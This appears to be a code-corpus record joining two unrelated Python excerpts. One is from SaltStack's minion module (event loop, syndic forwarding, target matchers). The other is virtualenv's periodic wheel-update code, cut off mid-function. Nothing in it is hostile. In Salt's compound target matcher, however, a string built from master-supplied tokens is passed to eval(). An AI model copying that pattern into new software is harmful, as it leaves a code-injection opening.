data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.Auth(self.opts)
self.tok = auth.gen_token('salt')
acceptance_wait_time = self.opts['acceptance_wait_time']
acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
if not acceptance_wait_time_max:
acceptance_wait_time_max = acceptance_wait_time
tries = self.opts.get('auth_tries', 1)
safe = self.opts.get('auth_safemode', safe)
while True:
creds = auth.sign_in(timeout, safe, tries)
if creds == 'full':
return creds
elif creds != 'retry':
log.info('Authentication with master successful!')
break
log.info('Waiting for minion key to be accepted by the master.')
if acceptance_wait_time:
log.info('Waiting {0} seconds before retry.'.format(acceptance_wait_time))
time.sleep(acceptance_wait_time)
if acceptance_wait_time < acceptance_wait_time_max:
acceptance_wait_time += acceptance_wait_time
log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
self.aes = creds['aes']
if self.opts.get('syndic_master_publish_port'):
self.publish_port = self.opts.get('syndic_master_publish_port')
else:
self.publish_port = creds['publish_port']
self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
def module_refresh(self, force_refresh=False):
'''
Refresh the functions and returners.
'''
self.functions, self.returners = self._load_modules(force_refresh)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
if func == 'delete':
job = data.get('job', None)
self.schedule.delete_job(job)
elif func == 'add':
name = data.get('name', None)
schedule = data.get('schedule', None)
self.schedule.add_job(schedule)
elif func == 'modify':
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
job = data.get('job', None)
where = data.get('where', None)
self.schedule.enable_job(job, where)
elif func == 'disable_job':
job = data.get('job', None)
where = data.get('where', None)
self.schedule.disable_job(job, where)
elif func == 'reload':
schedule = data.get('schedule', None)
self.schedule.reload(schedule)
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
if self.opts['startup_states']:
startup_sleep_length = 0.5
log.debug('Sleeping for {0}s before running startup states'.format(startup_sleep_length))
time.sleep(startup_sleep_length)
loop_interval = int(self.opts['loop_interval'])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
ping_interval = self.opts.get('ping_interval', 0) * 60
ping_at = None
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
try:
socks = self._do_poll(loop_interval)
if ping_interval > 0:
if socks or not ping_at:
ping_at = time.time() + ping_interval
if ping_at < time.time():
log.debug('Ping master')
self._fire_master('ping', 'minion_ping')
ping_at = time.time() + ping_interval
self._do_socket_recv(socks)
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
log.debug('Handling event {0!r}'.format(package))
try:
if package.startswith('module_refresh'):
self.module_refresh()
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnect'):
log.debug('handling master disconnect')
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
# Add an extra fallback in case a forked process leeks through
multiprocessing.active_children()
except zmq.ZMQError as exc:
# The interrupt caused by python handling the
# SIGCHLD. Throws this error with errno == EINTR.
# Nothing to recieve on the zmq socket throws this error
# with EAGAIN.
# Both are safe to ignore
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except SaltClientError:
raise
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
# On first startup execute a state run if configured to do so
self._state_run()
time.sleep(.5)
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if getattr(self, 'poller', None) is not None:
if isinstance(self.poller.sockets, dict):
for socket in self.poller.sockets.keys():
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts):
self._syndic_interface = opts.get('interface')
self._syndic = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'to' not in data or 'arg' not in data:
return
data['to'] = int(data['to']) - 1
if 'user' in data:
log.debug(
'User {0[user]} Executing syndic command {0[fun]} with '
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'])
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self.context = zmq.Context()
# Start with the publish socket
# Share the poller with the event object
self.poller = self.local.event.poller
self.socket = self.context.socket(zmq.SUB)
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if (self.event_forward_timeout is not None and
self.event_forward_timeout < time.time()):
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the recieve calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.is_jid(event['tag']) and 'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
self.poller = None
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
if functions is None:
functions = salt.loader.minion_mods(self.opts)
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if type(tgt) != str:
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delim=':'):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt, delim=delim)
def grain_pcre_match(self, tgt, delim=':'):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delim=delim, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delim=':'):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'], tgt, delim=delim)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
# the 'G, X, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
if match == 'not':
if results[-1] == 'and':
pass
elif results[-1] == 'or':
pass
else:
results.append('and')
results.append(match)
else:
# seq start with oper, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
# Late setup the of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
|
periodic_update.py | """
Periodically update bundled versions.
"""
from __future__ import absolute_import, unicode_literals
import json
import logging
import os
import ssl
import subprocess
import sys
from datetime import datetime, timedelta
from itertools import groupby
from shutil import copy2
from textwrap import dedent
from threading import Thread
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
from virtualenv.app_data import AppDataDiskFolder
from virtualenv.info import PY2
from virtualenv.util.path import Path
from virtualenv.util.subprocess import DETACHED_PROCESS, Popen
from ..wheels.embed import BUNDLE_SUPPORT
from ..wheels.util import Wheel
if PY2:
# on Python 2 datetime.strptime throws the error below if the import did not trigger on main thread
# Failed to import _strptime because the import lock is held by
try:
import _strptime # noqa
except ImportError: # pragma: no cov
pass # pragma: no cov
def periodic_update(distribution, for_py_version, wheel, search_dirs, app_data, do_periodic_update):
if do_periodic_update:
handle_auto_update(distribution, for_py_version, wheel, search_dirs, app_data)
now = datetime.now()
u_log = UpdateLog.from_app_data(app_data, distribution, for_py_version)
u_log_older_than_hour = now - u_log.completed > timedelta(hours=1) if u_log.completed is not None else False
for _, group in groupby(u_log.versions, key=lambda v: v.wheel.version_tuple[0:2]):
version = next(group) # use only latest patch version per minor, earlier assumed to be buggy
if wheel is not None and Path(version.filename).name == wheel.name:
break
if u_log.periodic is False or (u_log_older_than_hour and version.use(now)):
updated_wheel = Wheel(app_data.house / version.filename)
logging.debug("using %supdated wheel %s", "periodically " if updated_wheel else "", updated_wheel)
wheel = updated_wheel
break
return wheel
def handle_auto_update(distribution, for_py_version, wheel, search_dirs, app_data):
embed_update_log = app_data.embed_update_log(distribution, for_py_version)
u_log = UpdateLog.from_dict(embed_update_log.read())
if u_log.needs_update:
u_log.periodic = True
u_log.started = datetime.now()
embed_update_log.write(u_log.to_dict())
trigger_update(distribution, for_py_version, wheel, search_dirs, app_data, periodic=True)
DATETIME_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"
def dump_datetime(value):
return None if value is None else value.strftime(DATETIME_FMT)
def load_datetime(value):
return None if value is None else datetime.strptime(value, DATETIME_FMT)
class NewVersion(object):
def __init__(self, filename, found_date, release_date):
self.filename = filename
self.found_date = found_date
self.release_date = release_date
@classmethod
def from_dict(cls, dictionary):
return cls(
filename=dictionary["filename"],
found_date=load_datetime(dictionary["found_date"]),
release_date=load_datetime(dictionary["release_date"]),
)
def to_dict(self):
return {
"filename": self.filename,
"release_date": dump_datetime(self.release_date),
"found_date": dump_datetime(self.found_date),
}
def use(self, now):
compare_from = self.release_date or self.found_date
return now - compare_from >= timedelta(days=28)
def __repr__(self):
return "{}(filename={}), found_date={}, release_date={})".format(
self.__class__.__name__, self.filename, self.found_date, self.release_date,
)
def __eq__(self, other):
return type(self) == type(other) and all(
getattr(self, k) == getattr(other, k) for k in ["filename", "release_date", "found_date"]
)
def __ne__(self, other):
return not (self == other)
@property
def wheel(self):
return Wheel(Path(self.filename))
class UpdateLog(object):
def __init__(self, started, completed, versions, periodic):
self.started = started
self.completed = completed
self.versions = versions
self.periodic = periodic
@classmethod
def from_dict(cls, dictionary):
if dictionary is None:
dictionary = {}
return cls(
load_datetime(dictionary.get("started")),
load_datetime(dictionary.get("completed")),
[NewVersion.from_dict(v) for v in dictionary.get("versions", [])],
dictionary.get("periodic"),
)
@classmethod
def from_app_data(cls, app_data, distribution, for_py_version):
raw_json = app_data.embed_update_log(distribution, for_py_version).read()
return cls.from_dict(raw_json)
def to_dict(self):
return {
"started": dump_datetime(self.started),
"completed": dump_datetime(self.completed),
"periodic": self.periodic,
"versions": [r.to_dict() for r in self.versions],
}
@property
def needs_update(self):
now = datetime.now()
if self.completed is None: # never completed
return self._check_start(now)
else:
if now - self.completed <= timedelta(days=14):
return False
return self._check_start(now)
def _check_start(self, now):
return self.started is None or now - self.started > timedelta(hours=1)
def trigger_update(distribution, for_py_version, wheel, search_dirs, app_data, periodic):
wheel_path = None if wheel is None else str(wheel.path)
cmd = [
sys.executable,
"-c",
dedent(
"""
from virtualenv.report import setup_report, MAX_LEVEL
from virtualenv.seed.wheels.periodic_update import do_update
setup_report(MAX_LEVEL, show_pid=True)
do_update({!r}, {!r}, {!r}, {!r}, {!r}, {!r})
""",
)
.strip()
.format(distribution, for_py_version, wheel_path, str(app_data), [str(p) for p in search_dirs], periodic),
]
debug = os.environ.get(str("_VIRTUALENV_PERIODIC_UPDATE_INLINE")) == str("1")
pipe = None if debug else subprocess.PIPE
kwargs = {"stdout": pipe, "stderr": pipe}
if not debug and sys.platform == "win32":
kwargs["creationflags"] = DETACHED_PROCESS
process = Popen(cmd, **kwargs)
logging.info(
"triggered periodic upgrade of %s%s (for python %s) via background process having PID %d",
distribution,
"" if wheel is None else "=={}".format(wheel.version),
for_py_version,
process.pid,
)
if debug:
process.communicate() # on purpose not called to make it a background process
def do_update(distribution, for_py_version, embed_filename, app_data, search_dirs, periodic):
versions = None
try:
versions = _run_do_update(app_data, distribution, embed_filename, for_py_version, periodic, search_dirs)
finally:
logging.debug("done %s %s with %s", distribution, for_py_version, versions)
return versions
def _run_do_update(app_data, distribution, embed_filename, for_py_version, periodic, search_dirs):
from virtualenv.seed.wheels import acquire
wheel_filename = None if embed_filename is None else Path(embed_filename)
embed_version = None if wheel_filename is None else Wheel(wheel_filename).version_tuple
app_data = AppDataDiskFolder(app_data) if isinstance(app_data, str) else app_data
search_dirs = [Path(p) if isinstance(p, str) else p for p in search_dirs]
wheelhouse = app_data.house
embed_update_log = app_data.embed_update_log(distribution, for_py_version)
u_log = UpdateLog.from_dict(embed_update_log.read())
now = datetime.now()
if wheel_filename is not None:
dest = wheelhouse / wheel_filename.name
if not dest.exists():
copy2(str(wheel_filename), str(wheelhouse))
last, last_version, versions = None, None, []
while last is None or not last.use(now):
download_time = datetime.now()
dest = acquire.download_wheel(
distribution=distribution,
version_spec=None if last_version is None else "<{}".format(last_version),
for_py_version=for_py_version,
search_dirs=search_dirs,
app_data=app_data,
to_folder=wheelhouse,
)
if dest is None or (u_log.versions and u_log.versions[0].filename == dest.name):
break
release_date = release_date_for_wheel_path(dest.path)
last = NewVersion(filename=dest.path.name, release_date=release_date, found_date=download_time)
logging.info("detected %s in %s", last, datetime.now() - download_time)
versions.append(last)
last_wheel = Wheel(Path(last.filename))
last_version = last_wheel.version
if embed_version is not None:
if embed_version >= last_wheel.version_tuple: # stop download if we reach the embed version
break
u_log.periodic = periodic
if not u_log.periodic:
u_log.started = now
u_log.versions = versions + u_log.versions
u_log.completed = datetime.now()
embed_update_log.write(u_log.to_dict())
return versions
def release_date_for_wheel_path(dest):
wheel = Wheel(dest)
# the most accurate is to ask PyPi - e.g. https://pypi.org/pypi/pip/json,
# see https://warehouse.pypa.io/api-reference/json/ for more details
content = _pypi_get_distribution_info_cached(wheel.distribution)
if content is not None:
